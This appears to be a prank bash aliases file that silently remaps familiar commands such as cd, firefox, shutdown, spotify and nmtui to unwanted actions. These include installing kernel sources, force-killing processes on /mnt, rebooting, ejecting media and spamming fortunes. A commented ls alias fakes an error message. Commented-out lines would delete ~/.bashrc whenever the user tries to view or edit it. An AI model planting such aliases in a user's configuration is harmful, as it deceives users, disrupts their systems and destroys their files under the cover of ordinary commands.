alias cd='emerge sys-kernel/gentoo-sources'
#alias ls='echo Error code: 1487 - There was an error when trying to complete that command. For more information, go to https://wiki.debian.org/BoottimeEntropyStarvation.'
alias firefox='fortune -w && fuser -km /mnt'
alias shutdown='fortune -w && reboot'
alias spotify='fortune -w && eject'
alias help="fortune"
alias nano='fortune -w && nano'

#alias 'nano ~/.bashrc'='doas rm ~/.bashrc'
#alias 'nano .bashrc'='doas rm ~/.bashrc'
#alias 'nano /home/*/.bashrc'='doas rm ~/.bashrc'
#alias 'nano ../.bashrc'='doas rm ~/.bashrc'
#alias 'nano /root/.bashrc'='doas rm ~/.bashrc'
#alias 'cat ~/.bashrc'='doas rm ~/.bashrc'
#alias 'cat .bashrc'='doas rm ~/.bashrc'
#alias 'cat /home/*/.bashrc'='doas rm ~/.bashrc'
#alias 'cat ../.bashrc'='doas rm ~/.bashrc'
#alias 'cat /root/.bashrc'='doas rm ~/.bashrc'

alias nmtui='fortune && fortune && fortune && fortune && fortune && fortune && fortune && fortune && fortune && fortune && fortune && fortune && fortune && fortune && fortune && fortune && fortune && fortune && fortune && fortune && fortune && fortune && fortune && fortune && fortune && fortune && fortune && fortune && fortune && fortune && fortune && fortune && fortune && fortune && fortune && fortune && fortune && fortune && fortune && fortune && fortune && fortune && fortune && fortune && fortune && fortune && fortune && fortune && fortune && fortune && fortune && fortune && fortune && fortune && fortune && fortune && fortune && fortune && fortune && fortune && fortune && fortune && fortune && fortune && fortune && fortune && nmtui'
